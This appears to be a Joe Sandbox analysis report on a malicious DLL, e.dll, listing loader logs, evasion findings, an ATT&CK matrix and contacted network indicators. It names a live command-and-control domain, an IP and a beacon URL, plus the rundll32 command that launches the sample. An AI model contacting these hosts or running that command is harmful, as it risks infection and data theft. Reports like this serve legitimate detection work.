Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-1949
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06982A81 FindFirstFileW,3_3_06982A81
Source: rundll32.exe, 00000003.00000002.84973750078.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857412676.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973505391.0000000003352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000003.00000002.84973505391.0000000003352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWJ
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03290005 VirtualAlloc,LoadLibraryA,LdrGetProcedureAddress,VirtualProtect,3_2_03290005
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0040C340 mov eax, dword ptr fs:[00000030h]0_2_0040C340
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03290391 mov eax, dword ptr fs:[00000030h]3_2_03290391
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_27AC1120 mov ebx, dword ptr fs:[00000030h]3_2_27AC1120

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 104.21.69.9 443Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\e.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00401090 cpuid 0_2_00401090
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		111
Process Injection		1
Virtualization/Sandbox Evasion		OS Credential Dumping11
Security Software Discovery		Remote Services1
Archive Collected Data		21
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		111
Process Injection		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Rundll32		NTDS13
System Information Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
e.dll100%AviraHEUR/AGEN.1300770
e.dll100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
w0t.lol
104.21.69.9
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://w0t.lol/S2wueuBWcKItxJBxaKQWGAqL7hMS3sfSm3IIJcJI-UnDuhqZF3FZYmhcdfYjgTH9ls8toERqLL6uvqWxks5TXG7p4KTZE3NtE0QUExXonRRsVxuWAUUUBfY4OBn0j6WOD9WysDP09mb9Mw2zw25E4216qfUiBb1_-f0hXmBwm-5V3zs05mClVySIs4Q2owQXkeB3urgLrouGFuJF9ZudjP54bzXceldzNx2o8pCLFM6WK1vNqyQJ4ZGEs5wabg119exWDBy_U0fDfIKkmquk4nx095rTVG61p-61BBPfkxzOTkQYmZHX6uOiApQ41hZ0OE5yH5VhrRws_4Dk7blD-zRqQGci0UruB3OYd7fIEanuxbGDB6PoPMh8nJxhyUjELjSu3EwICQdnYkBbiVs2LkVCWKmmn2lIaQTzB-OoNpw-dg1CW7D5qiS6SoaepRgtrue
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://w0t.lol/S2wueuBWcKItxJBxaKQWGAqL7hMS3sfSm3IIJcJI-UnDuhqZF3FZYmhcdfYjgTH9ls8toERqLL6uvqWxks5Trundll32.exe, 00000003.00000002.84973505391.0000000003352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmpfalse
        		unknown
        http://www.quovadis.bm0rundll32.exe, 00000003.00000002.84973852233.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857080785.00000000033CE000.00000004.00000020.00020000.00000000.sdmpfalse
          		unknown
          https://w0t.lol/rundll32.exe, 00000003.00000003.84857294274.000000000339C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            https://ocsp.quovadisoffshore.com0rundll32.exe, 00000003.00000002.84973852233.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857080785.00000000033CE000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://w0t.lol/vrundll32.exe, 00000003.00000003.84857294274.000000000339C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://w0t.lol/Trundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  104.21.69.9
                  		w0t.lolUnited States
                  		13335CLOUDFLARENETUStrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1523389
                  Start date and time:2024-10-01 15:10:35 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 13m 18s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                  Run name:Suspected Instruction Hammering
                  Number of analysed new started processes analysed:5
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:e.dll
                  Detection:MAL
                  Classification:mal72.bank.evad.winDLL@6/0@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 88%
                  • Number of executed functions: 72
                  • Number of non-executed functions: 26
                  Cookbook Comments:
                  • Found application associated with file extension: .dll
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: e.dll

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUSSales_Contract_Main_417053608_09.2024.pdfGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
